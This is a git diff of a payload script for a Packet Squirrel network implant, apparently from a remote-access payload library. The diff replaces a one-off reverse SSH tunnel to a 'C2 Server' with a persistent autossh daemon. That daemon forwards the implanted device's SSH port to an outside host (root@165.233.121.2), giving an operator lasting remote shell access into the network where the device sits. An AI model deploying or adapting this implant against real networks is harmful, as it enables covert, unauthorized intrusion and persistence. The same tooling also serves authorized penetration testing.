diff --git a/payloads/library/remote-access/SSH-remote-access/payload.sh b/payloads/library/remote-access/SSH-remote-access/payload.sh index 76374ca..21372b8 100644 --- a/payloads/library/remote-access/SSH-remote-access/payload.sh +++ b/payloads/library/remote-access/SSH-remote-access/payload.sh @@ -9,56 +9,78 @@ # # LED State Descriptions # Magenta Solid - SSH connecting -# Blue - SSH connection successful +# Amber - SSH connection successful # -# C2 Server address, port and tunnel port -c2_server="192.168.1.145" -c2_tunnel_port=2222 -tunnel_user="username" -# no pass needed, headless mode required so RSA key file is used. -# generate in this directory with: 'ssh -t rsa -b 2048 -f id_rsa' - -# waiting for button press to start SSH connection. -#BUTTON -# - -# Magenta indicates SSH connection is launching and the server should have received the connection. +NETMODE NAT LED SETUP -echo -e "SETUP Phase\n" >> /root/payloads/switch3/debug.txt - -# we need an IP, so it'll have to be NAT, unless implanted inline. -NETMODE NAT -sleep 8 - -# debug -#echo -e "NAT configured.\n" $(ifconfig) >> /root/payloads/switch3/debug.txt - -# fix file permission problems -# chmod 600 id_rsa - -# -R indicates remote port forwarding which tunnels connections to localhost on server to client. -# Once complete, connect to remote SSH server and connect to the squirrel by connecting to localhost at -# the tunnel port specified on the server to reach the Squirrel. +# no pass needed, headless mode required so RSA key file is used. # -# default port is 22 -echo -e "Connecting to Server.\n" >> /root/payloads/switch3/debug.txt +# generate the key by running the following command in the /root/.ssh/ folder: +# 'ssh -t rsa -b 2048 -f id_rsa' +# +# To ensure that this works as intended, the user will have to connect to this host at least once +# with ssh -i /root/.ssh/id_rsa username@remote_server_ip to add this server to the squirrels list +# of trusted hosts. +# +# If this step fails, the payload will fail. + +autossh_host="root@165.233.121.2" +autossh_host_ip=$(echo $autossh_host | cut -d '@' -f2) +autossh_port="22" +autossh_remoteport="2222" +autossh_localport="22" + +if ! grep $autossh_host_ip /root/.ssh/known_hosts; then + echo "$autossh_host not in known_hosts, exiting..." >> /root/autossh.log + LED FAIL + exit 1 +fi + +# +# For the life of me I couldn't get SSH to work. The funny thing was it would +# run in the shell command, but not in the payload. The following solution +# implements a tool called autossh which ensures nothing funky happens to the +# connection. +# +# the following was ripped from dark_pyrro (the legend) via: +# https://codeberg.org/dark_pyrro/Packet-Squirrel-autossh/src/branch/main/payload.sh +# + +# waiting until eth1 acquires IP address +while ! ifconfig "eth1" | grep "inet addr"; do sleep 1; done echo -e "starting server.\n" >> /root/payloads/switch3/debug.txt -service sshd start -sleep 3 -ssh -R $c2_tunnel_port:127.0.0.1:22 -i /root/payloads/switch3/id_rsa $tunnel_user@$c2_server -# echo $ssh_out >> /root/payloads/switch3/debug.txt -# ssh_pid=$! +# starting sshd and waiting for process to start +/etc/init.d/sshd start +until netstat -tulpn | grep -qi "sshd" +do + sleep 1 +done -echo -e "Server Connected.\n" >> /root/payloads/switch3/debug.txt +# stopping autossh +/etc/init.d/autossh stop + +# +# Much like the SSH server, AutoSSH has a configuration file. This +# needs to be configured to support this connection as a daemon. +# +# Create a "fresh template" for the autossh configuration +# Starting with an empty autossh file in /etc/config +# isn't something that uci is very fond of +echo "config autossh" > /etc/config/autossh +echo " option ssh" >> /etc/config/autossh +echo " option enabled" >> /etc/config/autossh + + +# UCI configuration and commission +uci set autossh.@autossh[0].ssh="-i /root/.ssh/id_rsa -R "$autossh_remoteport":127.0.0.1:"$autossh_localport" "$autossh_host" -p "$autossh_port" -N -T" +uci set autossh.@autossh[0].enabled="1" +uci commit autossh LED ATTACK -# WARNING: Initial SSH connection must be manual, since c2_server may not be included in trusted_hosts file -# SSH will prompt for verification, and to add host to trusted hosts file. -#BUTTON 365d && { -# kill $ssh_pid -#} +# starting autossh +/etc/init.d/autossh start \ No newline at end of file